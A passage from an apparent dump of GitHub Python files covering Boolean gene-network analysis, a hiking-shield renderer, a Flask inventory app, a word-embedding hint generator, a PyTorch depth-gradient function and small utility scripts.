indices]\n Inters.extend(parents)#[p for p in parents if p!= inter_val])\n \n # if the node's parents have been discovered, the node is added to the Basin list and the searh\n # continues with it's parents\n Basin.append(inter_val) \n Inters = [i for i in Inters if (i != inter_val) and (i not in Basin)]\n\n if len(Inters) == 0: \n done = True\n\n Basins[attractor] = Basin\n if verbose: \n print('(Attractor length, Attractor elements), Size of Basin')\n for key in Basins: \n print(key, len(Basins[key]))\n \n return Basins\n\n\n\n\n\n\n#=============================================================================\n# SENSITIVITY FUNCTIONS\n#=============================================================================\n\ndef get_Hamming_neighbors(x):\n '''The input x is a binary list or tuple of length N. The function finds all N tuples y, \n that differ from x in exactly one position'''\n \n x = np.array(x)\n neighbors = []\n for i in range(len(x)):\n y = x.copy()\n y[i] = 1-x[i]\n neighbors.append(tuple(y))\n \n return neighbors\n\n\ndef Sensitivity(func_dict):\n ''' Calaculates the Sensitivity of a Boolean Function i.e the average number of changes in \n the output if one of the inputs changes\"\n '''\n S = np.zeros(len(func_dict.keys())) \n for x_idx, x in enumerate(func_dict.keys()): \n x_neighbors = get_Hamming_neighbors(x)\n S[x_idx] = sum([abs(func_dict[x]-func_dict[y])for y in x_neighbors])\n\n return np.mean(S)\n\n\ndef NetworkSensitivity(Net):\n ''' Calculates the Sensitivity of each node in a Boolean Network and returns the result as a dictionary\n where the keys are the nodeIDs and the values are the Sensitivity.\n '''\n Sens = {}\n for nodeID, node in Net.nodeDict.items(): \n Ninps = len(node.InputIDs)\n func_dict = {}\n inputs = list(product((0,1), repeat=Ninps))\n for inp in inputs: \n func_dict[inp] = node.UpdateFunc(inp)\n Sens[nodeID] = Sensitivity(func_dict)\n return Sens\n\n\n#=============================================================================\n# CANALYZING FUNCTIONS\n#=============================================================================\n\n\ndef is_canalyzing(func_dict):\n ''' checks if a Boolean function in dictionary format is canalzing and returns the index of the canalyzed variable.\n If the function is not canalyzing is_canalyzing will return -1'''\n \n Inputs = list(func_dict.keys())\n Ninps = len(Inputs[0])\n func_array = np.zeros((2**Ninps, Ninps+1))\n \n for inp_idx, inp in enumerate(Inputs): \n func_array[inp_idx, :Ninps] = inp\n func_array[inp_idx, Ninps] = func_dict[inp]\n #print(func_array)\n \n for k in range(Ninps): \n idx0 = np.where(func_array[:, k]==0)[0]\n idx1 = np.where(func_array[:, k]==1)[0]\n \n if (func_array[idx0, Ninps]==1).all() or (func_array[idx0, Ninps]==0).all(): \n return k\n \n elif (func_array[idx1, Ninps]==1).all() or (func_array[idx1, Ninps]==0).all(): \n return k\n \n return -1\n\ndef NetworkCanalyzing(Net):\n ''' Determines for each node in the network if its update function is canalyzing and returns a dictionary where the \n keys are the nodeIDs and the values are -1 if the update function is not canalyzing, or the index of the canalyzed varaible otherwise.\n '''\n Cana = {}\n for nodeID, node in Net.nodeDict.items(): \n Ninps = len(node.InputIDs)\n func_dict = {}\n inputs = list(product((0,1), repeat=Ninps))\n for inp in inputs: \n func_dict[inp] = node.UpdateFunc(inp)\n Cana[nodeID] = is_canalyzing(func_dict)\n return Cana\n\n#=============================================================================\n# CLUSTERING FUNCTIONS\n#=============================================================================\n\ndef find_clusters(Net): \n '''\n Finds clusters in the network by first calclating the attractor states and then finding sets of nodes that have low\n joint entropy. \n \n Output: list of tuples, where the first entry is a tuple of node indices and the second entry is the jount entropy\n '''\n\n a_start, a_stop = identify_attactors(Net)\n nodes = Net.NodeIDs\n # calculate the joint attaractor distribution\n d = dit.Distribution(a_start, [1/len(a_start)]*len(a_start))\n \n entropies = []\n clusters = []\n for pair in combinations(range(len(nodes)), 2): \n #find all pairs that have entropy lower than 1 \n H = dit.shannon.entropy(d.marginal(pair))\n if H <= 1: \n entropies.append((pair, dit.shannon.entropy(d.marginal(pair))))\n\n for pair in entropies: \n # successively add nodes to the pairs to find larger clausters with low entropy\n a = find_cluster_containing_pair(Net, a_start, pair[0])\n clusters.append(tuple(a[0][0]))\n clusters = list(set(clusters))\n \n return [(c, dit.shannon.entropy(d.marginal(c))) for c in clusters] \n\ndef find_cluster_containing_pair(Net, a_start, pair): \n '''\n This is a helper function for the find_clusters() function. The funtion takes a pair of nodes as input and \n successively adds other nodes to find larger clusters with low entropy. \n '''\n #pair is a list\n nodes = Net.NodeIDs\n d = dit.Distribution(a_start, [1/len(a_start)]*len(a_start))\n stop = False\n entropies = [tuple((pair, dit.shannon.entropy(d.marginal(pair))))]\n length_counter = 3\n \n while not stop: \n \n print('\\r Checking tuples of length: {} '.format(length_counter), end = '')\n tuple_ent = []\n for H_tuple_idx, H_tuple in enumerate(entropies): \n for idx in [x for x in range(len(nodes)) if x not in H_tuple[0]]: \n new_tup = [x for x in H_tuple[0]] \n new_tup.append(idx)\n new_tup.sort()\n \n H = dit.shannon.entropy(d.marginal(new_tup))\n if H <= 1: \n tuple_ent.append(tuple((tuple(new_tup), H)))\n \n if len(tuple_ent)== 0: \n stop = True\n return entropies\n \n else: \n length_counter += 1\n unique_tups = list(set([tuple(x[0]) for x in tuple_ent]))\n tuple_ent = [tuple((ut, dit.shannon.entropy(d.marginal(ut)))) for ut in unique_tups] \n entropies = tuple_ent\n\n\n\n#=============================================================================\n# DIRECTED INFORMATION ALL PAIRS \n# this is equivalent to mutual information\n#=============================================================================\ndef DI_matrix(net, FixedNodes={}, RemoveNodes=[]): \n ''' This function clauclated the directed information flow between all pairs of nodes unding \n the expression defined in Mathai et. al., 2007 As discussed in the repost, \n in Boolean networks of the sort generated with the BooleaNetwork class, \n this is equivalent to calculating the mutual infromation\n '''\n \n NodeIDs = [str(s) for s in net.nodeDict.keys()]\n N = len(NodeIDs)\n\n start, stop = net.calc_all_updates(rounds=1, FixedNodes=FixedNodes)\n YY={}\n X={}\n XYY={}\n\n\n NodeIDs_working=NodeIDs.copy()\n for x in RemoveNodes: \n NodeIDs_working.remove(x)\n \n normalizer = float(start.shape[0])\n\n for x in NodeIDs_working: \n i = NodeIDs.index(x)\n c = Counter(start[:,i])\n X[NodeIDs[i]]=[c[k]/normalizer for k in range(2)]\n\n Y1Y2 = start[:, i] + 2*stop[:, i]\n c = Counter(Y1Y2)\n YY[NodeIDs[i]]=[c[k]/normalizer for k in range(4)]\n\n for y in NodeIDs_working: \n j = NodeIDs.index(y)\n c = Counter(4*start[:, j]+Y1Y2)\n XYY[NodeIDs[i]+'_'+NodeIDs[j]] = [c[k]/normalizer for k in range(8)]\n\n DI_Matrix = np.zeros((len(NodeIDs_working),len(NodeIDs_working)))\n MI_Matrix = DI_Matrix\n\n for i, node_i in enumerate(NodeIDs_working): \n for j, node_j in enumerate(NodeIDs_working): \n #MI_Matrix[i, j] = em.MutualInformation(pairs[node_i+'_'+node_j], singlesX[node_i], singlesY[node_j])\n DI_Matrix[i, j] = em.Entropy(YY[node_j])+em.Entropy(X[node_i])-em.Entropy(XYY[NodeIDs_working[j]+'_'+NodeIDs_working[i]])\n\n for i in range(len(NodeIDs_working)):\n DI_Matrix[i, i] = -100\n \n return DI_Matrix\n\n\ndef calc_mutual_information(self, X, Y, shift, verbose=False):\n '''\n Calculate Mutual Information between two nodes. \n\n X,Y....... Ids of the nodes between which MI should be calculated\n shift..... temporal distance between X and Y\n '''\n x_idx = list(Net.nodeDict.keys()).index(X)\n y_idx = list(Net.nodeDict.keys()).index(Y)\n\n start, stop = Net.calc_all_updates(rounds=max(1, shift))\n\n if shift==0: \n XX = stop[:, x_idx]\n YY = stop[:, y_idx]\n else: \n XX = start[:, x_idx]\n YY = stop[:, y_idx]\n\n px = [1- np.mean(XX), np.mean(XX)]\n py = [1- np.mean(YY), np.mean(YY)]\n\n c = Counter(XX+2*YY)\n p_joint = np.array([c[k] for k in range(4)])\n p_joint = p_joint/sum(p_joint)\n mi = em.MutualInformation(p_joint, px, py)\n #p_joint = [len(np.where(XX+YY==2)[0]), len(np.where(XX-YY==1)[0]), len(np.where(YY-XX==1)[0]), len(np.where(XX+YY==0)[0])]\n #p_joint = np.array(p_joint)/float(len(XX))\n\n if verbose: \n print(\"px = \\t{}\".format(px))\n print(\"py = \\t{}\".format(py))\n print(\"pxy = \\t{}\".format(p_joint))\n\n print(\"MI = {}\".format(mi))\n\n return mi\n\ndef calc_mutual_information_all_pairs(Net, rounds=1, plot=True, save_name='',RemoveNodes=[]): \n '''\n Calculates all updates for as many steps as specified by the rounds parameter. The claucluates mutual information\n at subsequent timesteps between all pairs of nodes independent of wheteher or not they are directly connected. \n If the plot parameter is set to true, an imshow plot will be produced from the the result matrix.\n '''\n\n NodeIDs = list(Net.nodeDict.keys())\n NodeIDs_working = NodeIDs\n for x in RemoveNodes: \n NodeIDs_working.remove(x)\n\n N = len(NodeIDs_working)\n MIs = np.zeros((N,N))\n start, stop = Net.calc_all_updates(rounds=max(1, rounds))\n if rounds==0: \n start=stop\n\n for idx_i, node_i in enumerate(NodeIDs_working):\n for idx_j, node_j in enumerate(NodeIDs_working):\n\n XX = start[:, idx_i]\n YY = stop[:, idx_j]\n px = [1- np.mean(XX), np.mean(XX)]\n py = [1- np.mean(YY), np.mean(YY)] \n p_joint = [len(np.where(XX+YY==2)[0]), len(np.where(XX-YY==1)[0]), len(np.where(YY-XX==1)[0]), len(np.where(XX+YY==0)[0])]\n\n p_joint = np.array(p_joint)/float(len(XX))\n MIs[idx_i, idx_j] = em.MutualInformation(p_joint, px, py)\n\n if plot: \n #plt.figure(figsize=(5,5)) \n plt.imshow(MIs, aspect='auto')\n plt.xticks(np.arange(0, N,1), list(NodeIDs_working), rotation=90) \n plt.yticks(np.arange(0, N,1), list(NodeIDs_working)) \n plt.ylabel(\"t\", rotation=0, size=20)\n plt.xlabel(\"t+{}\".format(rounds), size=20)\n plt.colorbar()\n\n minor_locator = AutoMinorLocator(2)\n plt.gca().xaxis.set_minor_locator(minor_locator)\n plt.gca().yaxis.set_minor_locator(minor_locator)\n plt.grid(which='minor')\n\n if len(save_name)>0: \n plt.savefig(save_name)\n return MIs\n\n\n\n#=============================================================================\n# INFORMATION FLOW FUNCTIONS\n#=============================================================================\n\ndef get_parent_child_tuples(Net, Ninps):\n '''\n Finds all subsets of nodes where Ninps inputs feed into one output. \n In particular, when a node has more than Ninps inputs, all relevant subgroups of inputs will be returned.\n '''\n tuples = []\n for node in Net.nodeDict:\n parents = Net.nodeDict[node].InputIDs\n if len(parents) < Ninps: \n parent_combinations=[]\n else:\n parent_combinations = list(combinations(parents, r=Ninps))\n\n for pc in parent_combinations: \n tuples.append((list(pc), [node]))\n return tuples\n\n\ndef info_flow_in_tuples_and_triplets(Net, Ninps):\n ''' Calculates the information flow within pairs and triplets of nodes. \n If Ninps = 1 the function will find all nodes with at least one input and calculate \n the mutual information between input and output.\n If Ninps = 2 the fnction will find all nodes with at least 2 inputs and calculates mutual information and \n information decompostion between parents and child. \n '''\n \n if Ninps not in [1,2]:\n print('number of inputs can only be 1 or 2')\n return \n\n if Ninps == 1:\n tuples = get_parent_child_tuples(Net, 1)\n \n if not type(tuples[0][0][0]).__name__ == 'int': \n tuples_new = []\n IDs = list(Net.nodeDict.keys())\n for tup in tuples: \n tuples_new.append(tuple([[IDs.index(tup[0][0])],[IDs.index(tup[1][0])]]))\n tuples = tuples_new\n \n print('Calculating info flow for {} pairs....'.format(len(tuples)))\n start, stop = Net.calc_all_updates()\n mi = []\n \n for tup in tuples: \n states = [(start[i,tup[0][0]], stop[i,tup[1][0]]) for i in range(start.shape[0])]\n c = Counter(states)\n unique_states = list(c.keys())\n state_probs = np.array(list(c.values()))\n dist = dit.Distribution(unique_states, state_probs/sum(state_probs))\n \n mi.append(dit.shannon.mutual_information(dist, [0],[1]))\n return mi\n\n \n if Ninps == 2:\n tuples = get_parent_child_tuples(Net, 2)\n print('Calculating info flow for {} triplets....'.format(len(tuples)))\n\n if not type(tuples[0][0][0]).__name__ == 'int': \n tuples_new = []\n IDs = list(Net.nodeDict.keys())\n for tup in tuples: \n tuples_new.append(tuple([[IDs.index(tup[0][0]), IDs.index(tup[0][1])],[IDs.index(tup[1][0])]]))\n tuples = tuples_new\n \n \n start, stop = Net.calc_all_updates()\n syn = []\n red = []\n unique = []\n mi = []\n mi_pair = []\n\n for tup in tuples: \n states = [(start[i,tup[0][0]], start[i,tup[0][1]], stop[i,tup[1][0]]) for i in range(start.shape[0])]\n c = Counter(states)\n unique_states = list(c.keys())\n state_probs = np.array(list(c.values()))\n dist = dit.Distribution(unique_states, state_probs/sum(state_probs))\n a = dit.pid.PID_BROJA(dist)\n\n syn.append(a.get_partial(((0, 1),)))\n red.append(a.get_partial(((0,), (1,))))\n unique.append(a.get_partial(((0,),)))\n unique.append(a.get_partial(((1,),)))\n mi.append(dit.shannon.mutual_information(dist, [0],[2]))\n mi.append(dit.shannon.mutual_information(dist, [1],[2]))\n mi_pair.append(dit.shannon.mutual_information(dist, [0,1],[2]))\n \n return syn, red, unique, mi, mi_pair\n return syn, red, unique, mi, mi_pair\n\n\ndef info_decomposition_clusters(Net, InputsX, InputsY, Outputs, set_names=False):\n ''' \n Calculates information decomposition and mutual information between subgroups of nodes. \n For this the subgroups are first reduced to triplets by calculating the joint dirstribution of all\n nodes in a subgroup\n '''\n res, dist = prepare_cluster_distribution(Net, InputsX, InputsY, Outputs, set_names=False)\n\n pid = dit.pid.PID_BROJA(dist)\n\n uni0 = pid.get_partial(((0,),))\n uni1 = pid.get_partial(((1,),))\n syn = pid.get_partial((((0, 1),)))\n red = pid.get_partial((((0,), (1,))))\n\n mi = dit.shannon.mutual_information(dist, [0,1],[2])\n mi0 = dit.shannon.mutual_information(dist, [0],[2])\n mi1 = dit.shannon.mutual_information(dist, [1],[2])\n\n return {'UNI0':uni0, 'UNI1':uni1, 'SYN':syn, 'RED':red, 'MI0':mi0, 'MI1':mi1, 'MI':mi}\n\n\ndef prepare_cluster_distribution(Net, InputsX, InputsY, Outputs, set_names=False): \n '''Generates a dit Distribution of three random varaibles where each varaible represents a group of N>=1 original varaibles.'''\n start, stop = Net.calc_all_updates()\n Nodes = list(Net.nodeDict.keys())\n M = start.shape[0]\n \n inpX = np.zeros(M)\n for node_idx, node in enumerate(InputsX): \n inpX+= (node_idx+1)*start[:,Nodes.index(node)]\n \n inpY = np.zeros(M)\n for node_idx, node in enumerate(InputsY): \n inpY+= (node_idx+1)*start[:,Nodes.index(node)] \n \n outp = np.zeros(M)\n for node_idx, node in enumerate(Outputs): \n outp+= (node_idx+1)*stop[:,Nodes.index(node)] \n \n res = np.vstack((np.vstack((inpX, inpY)), outp))\n res = [tuple(res[:, i].astype(int)) for i in range(M)]\n c = Counter(res)\n states = list(c.keys())\n probs = list(c.values())\n d = dit.Distribution(states, [p/sum(probs) for p in probs])\n \n if set_names:\n d.set_rv_names([\"Inp1\",\"Inp2\",\"Outp\" ])\n \n return res, d\n\n\n\n#=============================================================================\n# PLOT FUNCTIONS\n#=============================================================================\ndef make_state_diagram(BooleanNetwork, FixedNodes={}, savename='', return_graph=False):\n '''\n Calculates all macro states of a Boolean network and their relationship. The resulting set of states \n is represented as a graph where node A is a parent of node B when one updating \n step leads from macro-state A to macro-state B. \n '''\n N = len(BooleanNetwork.nodeDict)-len(FixedNodes) # number of varying nodes\n names = [node_name for node_name in BooleanNetwork.nodeDict.keys() if not node_name in FixedNodes.keys()]\n start_values = list(product(range(2), repeat=N))\n \n G=nx.DiGraph()\n G.add_nodes_from(start_values)\n value_dict = FixedNodes # empty is nothing is fixed, containing fixed nodes otherwise\n \n for sv_idx, sv in enumerate(start_values): \n print(sv_idx/len(start_values), end='\\r')\n value_dict = {x:sv[i] for i, x in enumerate(names)}\n BooleanNetwork.assign_values_to_nodes(value_dict)\n \n start = tuple(BooleanNetwork.CurrentValues.values())\n BooleanNetwork.update_all()\n stop = tuple(BooleanNetwork.CurrentValues.values())\n G.add_edge(start, stop)\n #return G \n \n print('\\nwaiting for plot')\n pos = nx.planar_layout(G, scale=2)\n #pos = nx.kamada_kawai_layout(G, scale=100)\n #pos = nx.spiral_layout(G)\n labels = {a:''.join(tuple(map(str , a ))) for a in start_values}\n #nx.draw_networkx(G, pos=pos, node_color='thistle',node_shape='s',node_size=800,labels=labels,\n #edge_color='black', font_weight='bold', arrowprops=dict(arrowstyle=\"->\", max_arrow_width=0.3))\n nx.draw_networkx(G, pos=pos, node_color='thistle', node_size=300,labels=labels,\n edge_color='black' , arrowprops=dict(arrowstyle=\"->\", max_arrow_width=0.3))\n plt.axis(\"off\")\n\n if len(savename)>0: \n plt.savefig(savename) \n if return_graph: \n return G\n \n \n \ndef make_attractor_graph(Net, draw =True): \n '''Identifies the attractors of a Boolean network and generates a graph representinng theri relations'''\n a_start, a_stop = identify_attactors(Net)\n G = nx.DiGraph()\n G.add_nodes_from(a_start)\n G.add_edges_from([a_start[i],a_stop[i]] for i in range(len(a_start)))\n pos = generate_positions(G)\n\n if draw: \n nx.draw_networkx_nodes(G, pos=pos, node_size=300, node_color='lightgrey')\n nx.draw_networkx_edges(G, pos=pos )\n nx.draw_networkx_labels(G, pos=pos, labels={a:tup2str(a) for a in a_stop} )\n plt.axis('off')\n \n return G\n# =============================================================================\n","repo_name":"ClaudiaWinklmayr/BooleanNetworksOfGRN","sub_path":"python_files/boolean_net_functions.py","file_name":"boolean_net_functions.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5674361681","text":"import re\nimport gi\ngi.require_version('Rsvg', '2.0')\nfrom gi.repository import Rsvg\nimport os\n\nfrom ..common.tags import Tags\nfrom ..common.config import ShieldConfig\nfrom ..common.shield_maker import ShieldMaker\n\nclass KctSymbol(ShieldMaker):\n \"\"\" A shield with hiking shields as used by the Czech and Slovakian\n hiking clubs.\n See https://wiki.openstreetmap.org/wiki/Key:kct_red.\n \"\"\"\n\n def __init__(self, color, symbol, config):\n self.config = config\n self.uuid_pattern = f'kct_{{}}_{color}-{symbol}'\n self.color = color\n self.symbol = symbol\n\n def dimensions(self):\n bwidth = self.config.image_border_width or 0\n return (int((self.config.image_width or 16) + 0.5 * bwidth),\n int((self.config.image_height or 16) + 0.5 * bwidth))\n\n def render(self, ctx, w, h):\n # get the template file\n content = self.find_resource(self.config.kct_path, f'{self.symbol}.svg').decode('utf8')\n # patch in the correct color\n fgcol = tuple([int(x*255) for x in self.config.kct_colors[self.color]])\n color = '#%02x%02x%02x' % fgcol\n content = re.sub('#eeeeee', color, content)\n # now read in by cairo\n svg = Rsvg.Handle.new_from_data(content.encode())\n dim = svg.get_dimensions()\n\n ctx.scale(w/dim.width, h/dim.height)\n svg.render_cairo(ctx)\n\n\ndef create_for(tags: Tags, region: str, config: ShieldConfig):\n if config.kct_colors is None or config.kct_types is None:\n return None\n\n # slovakian system\n if tags.get('operator', '').lower() == 'kst':\n col = tags.get('colour')\n sym = tags.get('symbol')\n if col in config.kct_colors and sym in config.kct_types:\n return KctSymbol(col, sym, config)\n\n # Czech system\n tag = tags.starting_with('kct_')\n if tag is not None and tag.k[4:] in config.kct_colors and tag.v in config.kct_types:\n return KctSymbol(tag.k[4:], tag.v, config)\n\n return None\n","repo_name":"waymarkedtrails/waymarkedtrails-shields","sub_path":"wmt_shields/styles/kct_symbol.py","file_name":"kct_symbol.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"33880372737","text":"from flask import Flask, render_template, request, url_for, redirect, flash\nimport os\nfrom forms import ProductForm, ProductSaleForm\nfrom models import products, new_product\n\n\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n\n@app.route('/')\ndef mainpage():\n return render_template(\"mainpage.html\")\n\n\n@app.route('/dashboard', methods=[\"GET\", \"POST\"])\ndef add_product():\n ITEMS = products.all()\n product_form = ProductForm()\n if request.method == \"POST\":\n if request.form[\"btn\"] == \"Add Product\":\n if product_form.validate_on_submit():\n product = new_product.create(product_form.data)\n ITEMS = products.add(product)\n\n if request.form[\"btn\"] == \"Export Products\":\n products.export()\n if request.form[\"btn\"] == \"Load Products\": \n ITEMS = products.load()\n\n return render_template(\"add_product.html\", product_form=product_form, product_list=ITEMS)\n\n@app.route('/sell/', methods=[\"GET\", \"POST\"])\ndef sell_product(product_name):\n ITEMS = products.all()\n product_sale_form = ProductSaleForm()\n if request.method == \"POST\":\n if product_sale_form.validate_on_submit():\n if product_name in ITEMS:\n quantity = product_sale_form.data['sold_quantity']\n ITEMS = products.sell(product_name, quantity)\n return redirect(url_for('add_product'))\n return render_template(\"sell_product.html\", product_sale_form=product_sale_form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"AnnaOstoj/Projekt_Magazyn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2734772722","text":"# gensim monkeypatch\nimport collections.abc\n\ncollections.Mapping = collections.abc.Mapping\n\nfrom functools import partial\nimport pickle\n\nimport gensim.models.keyedvectors as word2vec\n\nimport math\n\nimport heapq\nimport json\n\nimport os\n\nfrom numpy import dot\nfrom numpy.linalg import norm\n\nimport re\nimport tqdm.contrib.concurrent\n\nfrom hashlib import sha1\n\nimport code, traceback, signal\n\n# check against all words + phrases in model?\nALL_WORDS = False\n\n\nmodel = word2vec.KeyedVectors.load_word2vec_format(\n \"../swectors-300dim.vec\", binary=False\n)\n\n\ndef make_words():\n words = []\n for word in model.key_to_index:\n words.append(word)\n\n return words\n\n\nwords = make_words()\n\n\ndef debug(sig, frame):\n \"\"\"Interrupt running process, and provide a python prompt for\n interactive debugging.\"\"\"\n d = {\"_frame\": frame} # Allow access to frame object.\n d.update(frame.f_globals) # Unless shadowed by global\n d.update(frame.f_locals)\n\n i = code.InteractiveConsole(d)\n message = \"Signal received : entering python shell.\\nTraceback:\\n\"\n message += \"\".join(traceback.format_stack(frame))\n i.interact(message)\n\n\ndef find_hints(secret, progress=True):\n if progress: # works poorly in parellel\n worditer = tqdm.tqdm(words, leave=False)\n else:\n worditer = words\n\n target_vec = model[secret]\n target_vec_norm = norm(target_vec)\n\n # syns = synonyms.get(secret) or []\n nearest = []\n reg = re.compile(\".*\\d.*\")\n\n for word in worditer:\n vec = model[word]\n # why not model.wv.similarity(wordA, wordB)?\n similarity = dot(vec, target_vec) / (norm(vec) * target_vec_norm)\n heapq.heappush(nearest, (similarity, word))\n if len(nearest) > 1000 or reg.match(word):\n heapq.heappop(nearest)\n nearest.sort()\n return secret, nearest\n\n\nif __name__ == \"__main__\":\n signal.signal(signal.SIGUSR1, debug) # Register handler\n\n # synonyms = {}\n\n # with open(\"moby/words.txt\") as moby:\n # for line in moby.readlines():\n # line = line.strip()\n # words = line.split(\",\")\n # word = words[0]\n # synonyms[word] = set(words)\n\n print(\"loaded moby...\")\n\n hints = {}\n\n secrets = [] # to have length for progress bar\n\n with open(\"static/assets/js/secretWords.js\", encoding=\"utf-8\") as f:\n for line in f.readlines():\n line = line.strip()\n if not '\"' in line:\n continue\n secrets.append(line.strip('\",'))\n\n CONCURRENCY = True\n if CONCURRENCY:\n # may need to limit concurrency for memory reasons\n # XXX bug: wraps all results into a list, e.g. won't write any until the very end\n mapper = tqdm.contrib.concurrent.process_map(\n partial(find_hints, progress=False),\n secrets,\n max_workers=(os.cpu_count() + 4),\n chunksize=1,\n total=len(secrets),\n )\n else:\n mapper = tqdm.tqdm(\n (find_hints(secret) for secret in secrets), total=len(secrets)\n )\n\n with open(\"hints.json\", \"w+\") as hints_file:\n for secret, nearest in mapper:\n nearest = [(float(score), word) for score, word in nearest]\n hints_file.write(json.dumps({\"word\": secret, \"neighbors\": nearest}))\n hints_file.write(\"\\n\")\n hints_file.flush()\n hints[secret] = nearest\n\n with open(b\"nearest.pickle\", \"wb\") as f:\n pickle.dump(hints, f)\n","repo_name":"BionicRiddle/swemantle","sub_path":"dump-hints.py","file_name":"dump-hints.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"37988113201","text":"import os\nfrom nevow import loaders\nfrom nevow import athena\n\n# Import PyMh files and modules.\nfrom Modules.Computer import logging_pyh as Logger\n\n# Handy helper for finding external resources nearby.\nwebpath = os.path.join(os.path.split(__file__)[0])\ntemplatepath = os.path.join(webpath, 'template')\n\ng_debug = 0\nLOG = Logger.getLogger('PyHouse.webRootMenu ')\n\n\nclass RootMenuElement(athena.LiveElement):\n \"\"\"\n \"\"\"\n docFactory = loaders.xmlfile(os.path.join(templatepath, 'rootMenuElement.html'))\n jsClass = u'rootMenu.RootMenuWidget'\n\n def __init__(self, p_workspace_obj):\n self.m_pyhouse_obj = p_workspace_obj.m_pyhouse_obj\n\n @athena.expose\n def doRootMenuReload(self, p_json):\n \"\"\" Process a message for a XML save/reload from the browser/client.\n \"\"\"\n LOG.info(\"Self: {}\".format(self))\n self.m_pyhouse_obj.APIs.PyHouseMainAPI.SaveXml(self.m_pyhouse_obj)\n\n @athena.expose\n def doRootMenuQuit(self, p_json):\n \"\"\" Process a message for a browser logoff and quit that came from the browser/client.\n \"\"\"\n LOG.info(\"Self: {0:}; JSON: {1:}\".format(self, p_json))\n\n# ## END DBK\n","repo_name":"LyleH/PyHouse_1","sub_path":"src/Modules/Web/web_rootMenu.py","file_name":"web_rootMenu.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"5665756295","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom ipdb import set_trace\n\nclass DepthFunction(torch.autograd.Function):\n\n @staticmethod\n def forward(ctx, *input):\n ray0, ray_direction, d_pred, p_pred, local_latent, global_latent, decoder, mask = input[:8]\n ctx.save_for_backward(ray0, ray_direction, d_pred, p_pred, local_latent, global_latent)\n ctx.decoder = decoder\n ctx.mask = mask\n return d_pred\n\n @staticmethod\n def backward(ctx, grad_output):\n ray0, ray_direction, d_pred, p_pred, local_latent, global_latent = ctx.saved_tensors\n decoder = ctx.decoder\n mask = ctx.mask\n eps = 1e-3\n\n with torch.enable_grad():\n p_pred.requires_grad = True\n # set_trace()\n f_p, _, _ = decoder(p_pred.permute(1,0,2), local_latent, ray_dirs=None, return_occupancy=True,return_feature_vec=False, return_rgb=False, global_latent=global_latent) \n f_p_sum = f_p.sum()\n grad_p = torch.autograd.grad(f_p_sum, p_pred, retain_graph=True)[0]\n grad_p_dot_v = (grad_p * ray_direction).sum(-1)\n\n if mask.sum() > 0:\n grad_p_dot_v[mask == 0] = 1.\n # Sanity\n grad_p_dot_v[abs(grad_p_dot_v) < eps] = eps\n grad_outputs = -grad_output.squeeze(-1)\n grad_outputs = grad_outputs / grad_p_dot_v\n grad_outputs = grad_outputs * mask.float()\n\n # Gradients for latent code\n if local_latent is None or local_latent.shape[-1] == 0 or mask.sum() == 0:\n gradLatent = None\n else:\n gradLatent = torch.autograd.grad(f_p.squeeze(1).permute(1,0), local_latent, retain_graph=True,\n grad_outputs=grad_outputs)[0]\n\n # Gradients for network parameters phi\n if mask.sum() > 0:\n # set_trace()\n # Accumulates gradients weighted by grad_outputs variable\n grad_phi = torch.autograd.grad(\n f_p.squeeze(1).permute(1,0), [k for k in decoder.parameters()],\n grad_outputs=grad_outputs, retain_graph=True, allow_unused= True)\n else:\n grad_phi = [None for i in decoder.parameters()]\n\n # Return gradients for latent, z, and network parameters and None\n # for all other inputs\n out = [None, None, None, None, None, None, None, None] + list(grad_phi)\n return tuple(out)\n","repo_name":"CoolChameleon/SH3D","sub_path":"pytorch3d/implicitron/models/multisurf/src/rendUtils/depthFunc.py","file_name":"depthFunc.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44068328269","text":"class Solution:\n def maxSumAfterPartitioning(self, A: List[int], K: int) -> int:\n N = len(A)\n dp = [0]*(N+1)\n maxVal = {} \n for i in range(N+1):\n for j in range(1, K+1):\n if j<=i:\n if (i,j) not in maxVal: \n maxVal[i,j] = max((A[m] for m in range(i-j, i)))\n newVal = dp[i-j] + j * maxVal[i,j]\n # print(newVal)\n if newVal > dp[i]: dp[i] = newVal\n # print(dp)\n return dp[-1]\n","repo_name":"arw2019/AlgorithmsDataStructures","sub_path":"Partition Array for Maximum Sum/Leetcode_1043.py","file_name":"Leetcode_1043.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22113072648","text":"#!/bin/env python\n\nimport urllib\n\nPROFANITY_URL = \"http://www.wdyl.com/profanity?q=%s\"\n\ndef read_text():\n quotes = open(\"./movie_quotes.txt\")\n contents = quotes.read()\n quotes.close()\n check_profanity(contents)\n\ndef check_profanity(text_to_check):\n query = PROFANITY_URL % text_to_check\n connection = urllib.urlopen(query)\n output = connection.read()\n connection.close()\n if \"true\" in output:\n print(\"Profanity Alert!!!\")\n elif \"false\" in output:\n print(\"This document has no curse words!\")\n else:\n print(\"Could not scan the document properly.\")\n\n\nif __name__ == \"__main__\":\n read_text()","repo_name":"motasmarcelo/udacity-programming-foundations","sub_path":"lesson_2c/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37261245445","text":"import configparser\nimport os\nimport getopt\nimport sys\nfrom string import Template\n\ndef usage():\n print (\"Usage: \" + sys.argv[0] +\" --config config_file_name\\n\")\n\n print (\"Example:\")\n print (\"\\t\" + sys.argv[0] +\" --config ../../config/config.properties\")\n sys.exit(1)\n\ndef read_properties_file(prop_file):\n 